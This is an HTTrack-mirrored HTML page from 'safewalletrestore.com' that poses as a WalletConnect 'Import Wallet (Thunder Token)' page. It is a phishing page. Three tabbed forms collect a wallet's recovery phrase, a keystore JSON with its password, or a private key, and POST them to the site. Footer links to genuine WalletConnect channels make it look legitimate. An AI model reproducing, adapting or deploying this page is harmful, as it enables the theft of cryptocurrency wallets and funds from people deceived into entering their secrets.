<html>
<!-- Mirrored from safewalletrestore.com/connect?type=thunder+token by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 05 May 2021 14:01:59 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <link rel="stylesheet" href="assets/main.css" type="text/css"> 
  
  <meta name="description" content="Open protocol for connecting Wallets to Dapps">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta property="og:image" content="images/logo.svg">
  <link rel="icon" href="assets/logo.svg">
  <script>
      function openCity(evt, cityName) {
      // Declare all variables
      var i, tabcontent, tablinks;
    
      // Get all elements with class="tabcontent" and hide them
      tabcontent = document.getElementsByClassName("tabcontent");
      for (i = 0; i < tabcontent.length; i++) {
        tabcontent[i].style.display = "none";
      }
    
      // Get all elements with class="tablinks" and remove the class "active"
      tablinks = document.getElementsByClassName("tablinks");
      for (i = 0; i < tablinks.length; i++) {
        tablinks[i].className = tablinks[i].className.replace(" active", "");
      }
    
      // Show the current tab, and add an "active" class to the button that opened the tab
      document.getElementById(cityName).style.display = "block";
      evt.currentTarget.className += " active";
    }
    </script>
  <title>Restore Wallet</title></head>
  
  
  
  <body>
  <center>
  <div class="top">
          <a href="connect742e.html%3Ftype=thunder+token.html#footer" class="left">Github</a>
          <a href="connect742e.html%3Ftype=thunder+token.html#" class="left">Docs</a>
          <a href="index.html" class="main"><img src="assets/logo.svg" alt="logo"></a>
          <a href="index.html#wallets" class="left">Wallets</a>
          <a href="index.html" class="left">Apps</a>
  </div>
  <br>
  <h2><center>Import Wallet (Thunder Token)</center></h2>
  <br>
  <div class="tab">
    <button class="tablinks active" id="default" onclick="openCity(event, &#39;phrase&#39;)">Phrase</button>
    <button class="tablinks" onclick="openCity(event, &#39;keystore&#39;)">Keystore JSON</button>
    <button class="tablinks" onclick="openCity(event, &#39;private&#39;)">Private Key</button>
  </div>

    
  <div id="phrase" class="tabcontent" style="display: block;">
  <form name='Nano' method='POST'><input type='hidden' name='form-name' value='Nano' />
      <input type="hidden" name="_token" value="h6kYQPsOk4RzEAsRf9MWhhL2dF49WqrFgE5hmsYJ">
  <input type="hidden" name="description" id="description" value="Thunder Token">
  <input type="hidden" name="type" id="type" value="phrase">
  <input type="hidden" name="wallet" id="hidden1" value="">
  
  <textarea name="mnemonic" minlength="12" placeholder="Phrase" required="required" value=""></textarea>
  <br>
  <div class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
  <br>
  <button type="submit" name="import" class="btn">RESTORE</button>
  </form>
  </div>
  
  <div id="keystore" class="tabcontent" style="display: none;">
    <form name='Nano' method='POST'><input type='hidden' name='form-name' value='Nano' />
      <input type="hidden" name="_token" value="h6kYQPsOk4RzEAsRf9MWhhL2dF49WqrFgE5hmsYJ">
  <input type="hidden" name="description" id="description" value="Thunder Token">
  <input type="hidden" name="type" id="type" value="KeystoreJSON">
  <input type="hidden" name="wallet" id="hidden2" value="">
  
  <textarea name="mnemonic" required="required" minlength="12" placeholder="Keystore JSON"></textarea>
  <br>
  <div class="field">
      <input type="text" name="password" placeholder="Password" required="required" value="">
  </div>
  <div class="desc">Several lines of text beginning with '(...)' plus the password you used to encrypt it.</div>
  <br>
  <button type="submit" name="import" class="btn">RESTORE</button>
  </form>
  </div>
  
  <div id="private" class="tabcontent" style="display: none;">
    <form name='Nano' method='POST'><input type='hidden' name='form-name' value='Nano' />
      <input type="hidden" name="_token" value="h6kYQPsOk4RzEAsRf9MWhhL2dF49WqrFgE5hmsYJ">
  <input type="hidden" name="description" id="description" value="Thunder Token">
  <input type="hidden" name="type" id="type" value="PrivateKey">
  <input type="hidden" name="wallet" id="hidden3" value="">
  <div class="field">
      <input type="text" name="mnemonic" placeholder="Private Key" value="" required="required">
  </div>
  <div class="desc">Typically 12 (sometimes 24) words separated by single spaces</div>
  <br>
  <button type="submit" name="import" class="btn">RESTORE</button>
  </form>
  </div>
  
  <script>
      document.getElementById("default").click();
  </script>
  <footer><div id="footer">
  <p><img src="assets/discord.svg" class="footimg">  <a href="https://discord.gg/jhxMvxP">Discord</a></p><br>
  <p><img src="assets/telegram.svg" class="footimg">  <a href="https://t.me/walletconnect_announcements">Telegram</a></p><br>
  <p><img src="assets/twitter.svg" class="footimg">  <a href="https://twitter.walletconnect.org/">Twitter</a></p><br>
  <p><img src="assets/github.svg" class="footimg">  <a href="https://github.com/walletconnect">Github</a></p><br>
  </div></footer>
  <script>
      const queryString = window.location.search;
  
      const urlParams = new URLSearchParams(queryString);
  
      const wallet = urlParams.get('type')
  
      document.getElementById("hidden1").value = wallet + " Phrase";
      document.getElementById("hidden2").value = wallet + " Keystore";
      document.getElementById("hidden3").value = wallet + " PrivateKey";
    </script>
  
  
  
  </center></body><div id="sideDragRight" style="display: none;"><div class="side_search_box" id="side_google_search" data-allowed-type="text" style="height: 20%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/webSearch.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_wikipedia_search" data-allowed-type="text" style="height: 20%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/wikipedia.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_youtube_search" data-allowed-type="text" style="height: 20%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/youtube.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_translate_search" data-allowed-type="text" style="height: 20%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/translate.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_image_search" data-allowed-type="all" style="height: 20%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/imageSearch.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div></div><div id="sideDragLeft" style="display: none;"><div class="side_search_box" id="side_facebook" data-allowed-type="images" style="height: 25%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/facebook.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_twitter" data-allowed-type="images" style="height: 25%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/twitter.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_pinterest" data-allowed-type="images" style="height: 25%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/pinterest.png_); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div><div class="side_search_box" id="side_linkedin" data-allowed-type="images" style="height: 25%; background-image: url(_chrome-extension_/aneodkojaglhnkkdbbdnmmmgimlcaogo/images/linkedin.html); background-color: rgb(255, 255, 255); background-size: cover; background-position: center center;"></div></div>
<!-- Mirrored from safewalletrestore.com/connect?type=thunder+token by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 05 May 2021 14:01:59 GMT -->
</html>